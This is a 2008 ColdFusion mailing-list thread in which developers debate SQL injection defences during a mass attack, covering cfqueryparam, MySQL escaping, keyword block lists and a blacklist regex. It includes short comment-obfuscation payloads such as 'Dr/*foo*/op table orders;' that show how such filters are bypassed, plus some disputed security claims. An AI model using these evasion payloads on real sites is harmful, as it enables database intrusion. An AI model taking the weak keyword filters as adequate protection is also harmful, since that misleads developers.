one bad apple...
~Brad
> Do you think when I am using cfqueryparams for example with numbers like
> this is secured?:
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309628
Do you think when I am using cfqueryparams for example with numbers like
this is secured?:
SELECT * FROM product WHERE productoid=<cfqueryparam
value="#url.productoid#" cfsqltype="CF_SQL_INTEGER" maxlength="6">
Another example I am thinking worse is with text, I made it like this:
SELECT * FROM item WHERE L3=<cfqueryparam value="#url.L3#"
cfsqltype="CF_SQL_VARCHAR" maxlength="22">
I added maxlength to as more security, with PRODUCTOID it is always 6, and
text no more then 22, do you think this should work to
secure the site?, not talking about permissions to database etc, just about
cfqueryparams.
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309627
>>Not if you use MySQL. That DBMS allows for an alternative way to escape
those with a backslash.
Ok, then lets say that CFQP should alway be used with MySQl...
>>.. and you haven't turned off MySQL's default ways of escaping those
ticks
.. IF you have not turn off MySQL's default ways of escaping those ticks.
Anyway, IMHO letting MySQL escape anything like \b to a backspace character
or \r as a carriage return is asking for trouble.
Look at the possibility of messing up directory names stored in the
database, unless
you escape all backslashes yourself, a PITA, CF won't do it for you.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309626
Not if you use MySQL. That DBMS allows for an alternative way to escape
those with a backslash.
This has been a much blogged topic recently.
http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL
http://www.coldfusionmuse.com/index.cfm/2008/2/22/sql-injection-on-a-character-field
http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-escape-on-mysql
This is the technicality I was citing when I disagreed with Dave Watts the
other day about calling stored procs inline.
If you have a cfquery and a character field enclosed in single ticks and you
haven't turned off MySQL's default ways of escaping those ticks, you CAN GET
HACKED if you are not using cfqueryparam.
I've demonstrated a working example on the first link I provided.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309625
>>Closing the apostrophe is exactly how SQL injection occurs with text
field
Ok, you got it!
BUT CFQUERY will escape that apostophe anyway, so that the SQL injection
will
just be part of the string stored in the field either you use CFQP or not.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309623
Closing the apostrophe is exactly how SQL injection occurs with text field
and if you are using MySQL it is a very real possibility.
~Brad
> >>ANY string passed into cfqueryparam cannot be executed as SQL:
>
> Is it really possible to get an SQL statement executed from a string for
> a text field
> without closing the string first with an apostrophe?
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309622
>>Jeez, and value="URL.TryToHackThis" should be
value="#URL.TryToHackThis#"
... so you see that CFQP is not that easy to use ;-))
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309621
>>ANY string passed into cfqueryparam cannot be executed as SQL:
Is it really possible to get an SQL statement executed from a string for
a text field
without closing the string first with an apostrophe?
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309620
Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#"
That's what I get for answering at midnight.
On Thu, Jul 24, 2008 at 11:57 PM, James Holmes <james.holmes@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309619
Obviously cfsqltype="varchar" should be cfsqltype="cf_sql_varchar" (my typo).
On Thu, Jul 24, 2008 at 11:55 PM, James Holmes <james.holmes@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309618
I'll say it again.
ANY string passed into cfqueryparam cannot be executed as SQL:
select somecolumn
from sometable
where someothercolumn = <cfqueryparam cfsqltype="varchar"
value="URL.TryToHackThis">
It is irrelevant what gets passed in the URL.TryToHackThis; it cannot
be executed as a SQL statement. It's bound to the query as a
parameter.
On Thu, Jul 24, 2008 at 11:44 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
> >>So you know that it *always* prevents SQL injection in a standard
> query (select, update or delete).
>
> Really? Can you give an example of injection that will be prevented?
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309616
>>So you know that it *always* prevents SQL injection in a standard
query (select, update or delete).
Really? Can you give an example of injection that will be prevented?
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309614
So you know that it *always* prevents SQL injection in a standard
query (select, update or delete). That's a good enough reason to
always use it for me.
On Thu, Jul 24, 2008 at 10:58 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309611
This is not the only case. If you use pooled statements on the
datasource (which is a default for CF) you can demonstrate another
case:
Create a table.
Select * from it in a CF template.
Add a column to the table in the DB.
Run the same template again.
See the problem.
On Thu, Jul 24, 2008 at 11:20 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309608
>>It shouldn't make a difference if the SELECT * is in a cfquery
I see.
A very particular situation though. It will not prevent me from using
SELECT * when
I need all fields. This is more efficient than list all of them.
On the opposite, using SELECT * just to get a record count is the worse
case.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Jim Wright
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309606
On Thu, Jul 24, 2008 at 10:52 AM, Claude Schneegans <
schneegans@internetique.com> wrote:
>
> It may be a silly question, but why a SELECT * will brake because an
> unused column
> was dropped?
>
> It shouldn't make a difference if the SELECT * is in a cfquery (though that
is bad practice, too), but if it is in a view, it will break...such as this
example(in SQL Server, at least)...
CREATE TABLE tmpTest(foo int,bar int)
GO
CREATE VIEW tmpView AS SELECT * FROM tmpTest
GO
SELECT * FROM tmpView --Works correctly
GO
ALTER TABLE tmpTest DROP COLUMN bar
GO
SELECT * FROM tmpView --Throws error
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309605
Try telling that to Billy, he just got fired!
>>Do you fully understand what cfqueryparam does when binding text
parameters into the query?
Yes, fully.
I've designed CFX_ODBCinfo, and some other tools, and I'm pretty aware
of the way ODBC or JDBC drivers work.
This is precisely why I can say when it is useful and when it is not.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309603
>>Do you fully understand what cfqueryparam does when binding text
parameters into the query?
Yes, fully.
I've designed CFX_ODBCinfo, and some other tools, and I'm pretty aware
of the way ODBC or JDBC drivers work.
This is precisely why I can say when it is useful and when it is not.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309600
>>In our case, what
happened was that we dropped a column that hadn't been in use for awhile,
and everything broke because of the SELECT * and cfqueryparam.
It may be a silly question, but why a SELECT * will brake because an
unused column
was dropped?
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309592
>>But Billy has been told to turn:
SET myValue = #someOtherQuery.someOtherValue#
into:
SET myValue = #FORM.someOtherValue#
Then obviously, he should add CFQP to the line of code in the same time,
what's the problem?
My point is just that in some situations, CFQP is useless,
of course, is you change your code, then it is a new code, with a new
situation.
I don't see your argument.
Would you also use CFLOCK around CFSET of any variable, just in case
some variable is
moved to the session scope some day? (in CF5 for this example)? C'mon... ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309589
Do you fully understand what cfqueryparam does when binding text
parameters into the query?
On Thu, Jul 24, 2008 at 9:54 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
> 2. if both fields are text, CFQUERYPARAM won't detect anything harmful
> and won't help anyway.
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309588
But Billy has been told to turn:
SET myValue = #someOtherQuery.someOtherValue#
into:
SET myValue = #FORM.someOtherValue#
because Nigel in accounts wants to do his own thing.
If cfqp is in place, Billy will leave it there. He might not add it if it's
not!
Poor Billy...
>>and Billy New-Developer comes along and decides that
someOtherQuery.someOtherValue could really do with coming directly from the
user? Will he add the cfqp if it's not already there?
This is irrelevant, because:
1. if both fields are numeric, there is no possibility
OtherQuery.someOtherValue can
contain anything harmful;
2. if both fields are text, CFQUERYPARAM won't detect anything harmful
and won't help anyway.
3. if both fields have different types, then you should have fire your
db administrator, or
your developer, or both, a long time ago ;-)
in this case, the least you should do is to check the compatibility
of values BEFORE running the query,
and eventually make the appropriate conversion.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Dave Phillips
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309587
Adrian,
Thanks - I was wondering if I was EVER going to get a dissenting opinion!
;-)
I should clarify my previous statements by referring to "production level
code". I too use SELECT * when I'm doing test or development, and then, if
that script is ever going to make it into production, I go back and then
specify only the columns I need.
As for changing the SQL slightly, you are correct, that will force it to
work again, however, if you are dealing with a production control system and
you can't just 'tweak' the code without going through some sort of change
control process, then it will drive you NUTS (which it probably does
anyway). The idea is that to avoid the error completely, avoid the SELECT
*, and then you won't even have to touch the code at all.
In our environment, when we are ready to implement a change that requires DB
changes, often we put the db changes in before the code goes in (sometimes
even a day or more in advance), as long as they are DB changes that won't
break existing code, like 'adding columns', for example. In our case, what
happened was that we dropped a column that hadn't been in use for awhile,
and everything broke because of the SELECT * and cfqueryparam. Cfqueryparam
was initially blamed, but that wasn't the real problem, of course.
In any case, I made the 'generalized' statement on purpose hoping someone
would give me a reason to believe otherwise, and, as far as production level
code is concerned, I'm still not convinced. :)
Dave
Dear Dave Phillips, you have made a generalisation and I have a dissenting
opinion ;O)
I use SELECT * for quick and dirty scripts, always have done, always will
do.
Another way around the error is to change your SQL slightly. Throw in a line
break and a different execution plan is used.
No it's not ideal, but it works if you come across this problem.
Adrian
And for those of you who take this advice and DO use cfqueryparam
***always*** make sure you NEVER use SELECT * (which you shouldn't do
anyway).
I inherited an application that had a ton of SELECT * all over it and no
cfqueryparam tags. Over the years I added cfqueryparam tags as I worked on
the application, adding new features, and updated old ones/fixing bugs.
Then I ran into a situation. If I didn't update the SELECT * to include
actual column names, and one of the column names got dropped from the table
I was referencing in my SELECT query with a cfqueryparam, then BAM, the
application would break.
Two hard and fast rules to live by:
1. Use cfqueryparam - ALWAYS
2. Use SELECT * - NEVER
I'm sure someone will now provide some comment as when generalizations are
usually made, someone has a dissenting opinion (to which, of course, you are
fully entitled!) :)
Sincerely,
Dave Phillips
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309586
>>and Billy New-Developer comes along and decides that
someOtherQuery.someOtherValue could really do with coming directly from the
user? Will he add the cfqp if it's not already there?
This is irrelevant, because:
1. if both fields are numeric, there is no possibility
OtherQuery.someOtherValue can
contain anything harmful;
2. if both fields are text, CFQUERYPARAM won't detect anything harmful
and won't help anyway.
3. if both fields have different types, then you should have fire your
db administrator, or
your developer, or both, a long time ago ;-)
in this case, the least you should do is to check the compatibility
of values BEFORE running the query,
and eventually make the appropriate conversion.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Robert Harrison
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309585
Add one to the list. One of my old sites just got brought down. We restored
the DB and fixed it. That lasted about 15 minutes.
Now, how to deal with code fixing 40 old sites that we don't get paid
maintenance for. ARRRGH!
Robert B. Harrison
Director of Interactive services
Austin & Williams
125 Kennedy Drive, Suite 100 Hauppauge NY 11788
T : 631.231.6600 Ext. 119
F : 631.434.7022
www.austin-williams.com
Great advertising can't be either/or... It must be &.
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309582
Ok, I understand why you think it's ridiculous, but here's a reason to do
it.
What if you have:
UPDATE myTable
SET myValue = #someOtherQuery.someOtherValue#
and Billy New-Developer comes along and decides that
someOtherQuery.someOtherValue could really do with coming directly from the
user? Will he add the cfqp if it's not already there? Maybe, maybe not.
Having said that, I have queries that aren't cfqp'd because the data comes
from in the page.
Just a though.
Adrian
>>Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
Even with something like
UPDATE myTable SET myDate = <cfqueryparam value = "#now()#" CFSQLType
= "CF_SQL_TIMESTAMP">?
OR this:
UPDATE myTable SET myValue = <cfqueryparam value =
"#someOtherQuery.someOtherValue#" CFSQLType = "CF_SQL_INTEGER ">?
Just ridiculous.
OK, it "improves performance", if you care about micro seconds, but
there is no security aspect here.
The increase of performance can make a significant difference only for
very big queries or very repetitive code.
As the docs says: "Bind variable usage enhances performance when
executing a cfquery statement multiple times."
Otherwise, the advantage is only for security purpose,... and there is a
risk only for variables set by a visitor.
If the content is set by your CF program itself, where is the risk? It
is like putting a lock on an empty box.
Personally, I care mode about code readability than useless security.
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309581
Dear Dave Phillips, you have made a generalisation and I have a dissenting
opinion ;O)
I use SELECT * for quick and dirty scripts, always have done, always will
do.
Another way around the error is to change your SQL slightly. Throw in a line
break and a different execution plan is used.
No it's not ideal, but it works if you come across this problem.
Adrian
And for those of you who take this advice and DO use cfqueryparam
***always*** make sure you NEVER use SELECT * (which you shouldn't do
anyway).
I inherited an application that had a ton of SELECT * all over it and no
cfqueryparam tags. Over the years I added cfqueryparam tags as I worked on
the application, adding new features, and updated old ones/fixing bugs.
Then I ran into a situation. If I didn't update the SELECT * to include
actual column names, and one of the column names got dropped from the table
I was referencing in my SELECT query with a cfqueryparam, then BAM, the
application would break.
Two hard and fast rules to live by:
1. Use cfqueryparam - ALWAYS
2. Use SELECT * - NEVER
I'm sure someone will now provide some comment as when generalizations are
usually made, someone has a dissenting opinion (to which, of course, you are
fully entitled!) :)
Sincerely,
Dave Phillips
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309577
What if the hacker puts a space between EXEC and the (?
What about if I put:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
in my all cf files on my web site and if hacker gonna try to run any of this
files for example:
index.cfm?+code, mail.cfm?+code etc basically it attacks all on google
indexed, but if u put in all of the files, it should abort the connection
everytime when one files is executed and tehn any query wont be
executed....it should work...what do you think?
Radek
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309578
>>Keywords and banning IPs by themselves are not the answer
Exactly. But t helps to reduce the impact.
There is no panacea, only a set of measures.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309576
I'd be leery of simply looking for the word cast, or declare, or exec by
themselves. Better to include them as part of a regular expression that also
looks for semi-colons and ( like so:
REFindNoCase(';.*EXEC.*\(?.*\)?',VARIABLES.qString)
That looks for a ;, followed by any character (any number of times), then
EXEC, followed by any character (any number of times), then 0 or 1 (,
character, then finally 0 or 1 ).
That's not perfect, but it's better than just looking for those keywords
which could legitimately be included.
One of my websites got hit.. I always use cfqueryparam - at least for the
last few years, but some old code (this website started with version 1 of
CF) was still hanging around that was unprotected. I used that scanning
tool and it found about 20 unprotected querries out of about 20,000...
anyway - I set up a filter in the application.cfm to watch for a few of
these bad keywords..and temporarily ban those IPs.. I am getting hit a few
times a minute now.. on all of the websites I run.. however, one of the
owners got banned when he included the word "Declare" in a product
description:)
for this attack, I am thinking wouldn't it be wise to remove permission to
use the sysobjects and syscolumns from the user I access the MS SQL server
with from CF? (In other words, I am assuming that cf does not need access
to these tables - does it?)
----- Excess quoted text cut - see Original Post for more -----
around:
----- Excess quoted text cut - see Original Post for more -----
code...
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309575
>>var listSQLInject =
"cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr
op,--,'";
Don't forget to include "user" in your list. The first thing hackers try
generally is to get to
your table of users and passwords.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309574
And what about my page exec(.cfm?! :OD
Just checking my logs now and I'm getting hit by this too.
cfqp'd all the way though...
Even easier than monkeying with every single one of your cfquery's.... just
add following line to the TOP of all your application.cfm's:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
This will immediately shut down execution of any CFM that this piece of
trash tries to invoke to execute this particular type of SQL for.
peace, j
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309573
>>This is a classic reason why that sort of blocking method
is in my opinoin only useful for a temproary stop gap.
It is actually only safe and useful for numeric parameters or dates, but
for text fields
obviously, something more accurate must be used.
And CFQUERYPARAM won't help either.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309572
Gabriel,
Ok... Point taken - you are not peppering the list :) I like the regex below
- thank you. That's a useful addition to the discussion.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Mark,
The comment block obfuscation technique has been posted on blog articles
that I have read through the years, however
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems
to be the
only one that I can pull up after a 30 second search. Needless to say I am
almost certain that I have seen working examples in the past, which has led
me to attempt to scan for them.
// Seperator chars
CS = '.|[^[:alnum:]]';
// Short list of db objects to protect
DBObj.short = 'database|function|procedure|role|table|trigger|user|view';
// Build the regex
blackList = '@@|' &
'alter(#CS#)*?(#DBObj.short#)|' &
'cast(#CS#)*?\(|' &
'char(#CS#)*?\([[:alnum:]]{2}\)|' &
'create(#CS#)*?(#DBObj.short#)|' &
'declare(#CS#)*?(@|cursor)|' &
'delete(#CS#)*?from(#CS#)*?_|' &
'drop(#CS#)*?(#DBObj.short#)|' &
'exec(#CS#)*?\(|' &
'insert(#CS#)*?values(#CS#)*?\(+?|' &
'sysObjects|' &
'truncate(#CS#)*?table|' &
'update(#CS#)*?set(#CS#)+?|' &
'(s|x)p_[[:alnum:]_]+?|' &
'(\''(#CS#)*?(--)+?)|' &
'((--)+?(#CS#)*?\'')|' &
'/\*(#CS#)*?\*/';
An incomplete, but reasonable regex that allows individual keywords to pass
assuming that there are no other characters|keywords which would indicate a
possible threat in the parsed string, also includes a scan for block quotes
(even if only for my own piece of mind - white space obfuscation and word
split). I would do better, however I am not generally granted free licence
to spend time posting to discussion lists while I am supposed to be working
- else I would have written/posted actual code earlier.
What was the point of my original post then?
To illustrate that the list/array check is not a good enough solution, even
as a stop gap and to get people to perhaps look at doing a little more
research on their 'patch' before they go away and dedicate the requisite
hours to find and repair all missing queryparams etc, leaving their sites
still vulnerable. Sites are still being hit - is it better to wait 12 hours+
to make the point, or get the idea into someone's head now?
Just a note: I don't think a single post qualifies as 'peppering', nor do I
believe that pointing out legitimate flaws qualifies as pedantic.
G
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309565
Thanks for that link Gabriel. I'm sure it was intended for black hats, but
I think stuff like that should be required reading for any web programmer.
It's easier to defeat the enemy when you understand what they are doing.
~Brad
> Mark,
>
> The comment block obfuscation technique has been posted on blog articles
> that I have read through the years, however
> http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems
to be the
Author: Gabriel
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309564
Mark,
The comment block obfuscation technique has been posted on blog articles
that I have read through the years, however
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems
to be the
only one that I can pull up after a 30 second search. Needless to say I am
almost certain that I have seen working examples in the past, which has led
me to attempt to scan for them.
// Seperator chars
CS = '.|[^[:alnum:]]';
// Short list of db objects to protect
DBObj.short = 'database|function|procedure|role|table|trigger|user|view';
// Build the regex
blackList = '@@|' &
'alter(#CS#)*?(#DBObj.short#)|' &
'cast(#CS#)*?\(|' &
'char(#CS#)*?\([[:alnum:]]{2}\)|' &
'create(#CS#)*?(#DBObj.short#)|' &
'declare(#CS#)*?(@|cursor)|' &
'delete(#CS#)*?from(#CS#)*?_|' &
'drop(#CS#)*?(#DBObj.short#)|' &
'exec(#CS#)*?\(|' &
'insert(#CS#)*?values(#CS#)*?\(+?|' &
'sysObjects|' &
'truncate(#CS#)*?table|' &
'update(#CS#)*?set(#CS#)+?|' &
'(s|x)p_[[:alnum:]_]+?|' &
'(\''(#CS#)*?(--)+?)|' &
'((--)+?(#CS#)*?\'')|' &
'/\*(#CS#)*?\*/';
An incomplete, but reasonable regex that allows individual keywords to pass
assuming that there are no other characters|keywords which would indicate a
possible threat in the parsed string, also includes a scan for block quotes
(even if only for my own piece of mind - white space obfuscation and word
split). I would do better, however I am not generally granted free licence
to spend time posting to discussion lists while I am supposed to be working
- else I would have written/posted actual code earlier.
What was the point of my original post then?
To illustrate that the list/array check is not a good enough solution, even
as a stop gap and to get people to perhaps look at doing a little more
research on their 'patch' before they go away and dedicate the requisite
hours to find and repair all missing queryparams etc, leaving their sites
still vulnerable. Sites are still being hit - is it better to wait 12 hours+
to make the point, or get the idea into someone's head now?
Just a note: I don't think a single post qualifies as 'peppering', nor do I
believe that pointing out legitimate flaws qualifies as pedantic.
G
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309563
My thinking is:
The way it appears, a zombie will hit about 2 -12 pages on my web
server - over the course of a few seconds - then leave me alone..
On the first page they hit, if I ban them, then the next 1 to 11
tries will not succeed even if they happen to find a vulnerable file
anywhere on the server.
This attack appears to be well coordinated.. I get hit by one IP for
a few seconds, then it switches to another IP address for a few
seconds and I never see the first one again.. a few overlap so I may
see 3 or 4 different IPs at a time, but never more than that so far..
I am still working out the details but it seems to be working: I use
a server variable that holds a list of 20 banned IP addresses. When
a new IP appears, I add it to the end of the list and remove the first one..
seems to be working nicely.
I fixed the problem of banning people with the word Declare in the
form submission.. I now look for ";declare"
Keywords and banning IPs by themselves are not the answer - I
understand that - but along with the changes to the DB permissions,
use of sqlqueryparameters and cfparams, they add another layer of defense..
I can't believe this isn't a big news story.. it has been the focus
of my life for the last 48 hours:)
>Second and finally, this attack is a zombie attack using computers
>throughout the net infected with an adware program of some sort. It is not
>likely that banning IP addresses will have any significant impact on the
>number of attacks as their origin will be moving target.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309562
Gabriel,
Can you give me a rundown on how a sting like "dr/*foo*/op" would translate
as drop? Trying this in query analyzer does not seem to work.
se/*foo*/lect * from users
where archivebit = 1
order by firstname
Doesn't work...
So I created a table called foo and then ran this query like your example:
dr/*foo*/op table foo - still no dice
I've never seen successful syntax like that used in t-sql.
The function code does indeed generate false positives and it is a stop gap
to be sure... But I'm not so sure getting around it is as easy as you seem
to indicate.
Perhaps using inline comments is a method used against a different platform?
I'd be interested to find out.
Moreover, the point has been made "responsibly" over and over and over again
that these measures and NOT the fix - simply a way to stem the tide
temporarily while a defense (hopefully a defense in depth) is implemented.
Most of the folks on here who have been victimized by this malicious code
need a way to stop THIS attack while they finally get their code in order...
That's the purpose of these stop gap measures. Yes it's true the next attack
might step right over them - but these poor site owners need get a breather
so they can make those other more important necessary changes. That's real
world in the trenches... No one is advocating this sanitizing function as a
panacea - mearly another arrow in the quiver.
My suggestion to you is that since you feel you have a better mouse trap,
rather than just pepper the list with pendantic criticism, post some of that
fancy regex code that you think would be a better stop gap :) That might
help some of the folks who actually need your advice. If you post such a
function it would be much appreciated (I'd certainly like it).
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
With this latest spate of SQL attacks it has at least alerted CF (and non CF
coders hopefully) to the importance of sql injection and input sanitisation.
However I am noticing that almost all of the drop-in 'patches', almost all
of them seem to be straight list/array searches and there is almost no use
of regular expressions, meaning that these 'solutions' can barely even be
considered as suitable stop gaps until more appropriate measures can be
taken (cfqueryparam, sql permissions, etcetera) as they really can only stop
the most basic attempts and are likely to produce an inordinate number of
false positives (someone earlier noted that an admin was blacklisted for
using declare in a perfectly acceptable context).
It seems to me that such a knee jerk reaction and placing half thought out
measures in place almost does more harm than good in that it leaves people
with a false sense of security. Take the following code as case in point;
function IsSQLInject(input) {
var listSQLInject =
"cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr
op,--,'";
var arraySQLInject = ListToArray(listSQLInject);
var i = 1;
for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {
if(findNoCase(arraySQLInject[i], input)) return true;
}
return false;
}
Running this function over any user input scope will flag every input that
contains one of the listed strings, i.e. 'Casting sugar', 'selectable
criteria', 'Name: Grant Thompson', so on and so forth...
But at least you're secure, right?
Dr/*foo*/op table orders;
The simplest obfuscation of the command using basic tools and the function
is rendered useless.
Conclusion? You're stopping legitimate use and still leaving a wide open
door to any hacker willing to put in 30 seconds effort. How long until
someone rewrites the current attack pattern and uses the above method to
bypass all of the shiny new keyword scanners? Dec/*can't see me*/lare @s =
....
That's all without even touching upon encoding.
I'm not claiming to have the ideal patch, I'm not even claiming to have been
the first to notice these things - posts are on many CF blogs detailing
these issues in a far more articulate manner, but I think that advocating
simple keyword scanners in this list is irresponsible, bad advice can be
worse than no advice at all. All 'senior' CF programmers either do, or
should know better.
Please note that I mean no offence to anyone on this list (or anywhere else
for that matter).
Regards,
Gabriel
Author: Gabriel
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309560
With this latest spate of SQL attacks it has at least alerted CF (and non CF
coders hopefully) to the importance of sql injection and input sanitisation.
However I am noticing that almost all of the drop-in 'patches', almost all
of them seem to be straight list/array searches and there is almost no use
of regular expressions, meaning that these 'solutions' can barely even be
considered as suitable stop gaps until more appropriate measures can be
taken (cfqueryparam, sql permissions, etcetera) as they really can only stop
the most basic attempts and are likely to produce an inordinate number of
false positives (someone earlier noted that an admin was blacklisted for
using declare in a perfectly acceptable context).
It seems to me that such a knee jerk reaction and placing half thought out
measures in place almost does more harm than good in that it leaves people
with a false sense of security. Take the following code as case in point;
function IsSQLInject(input) {
var listSQLInject =
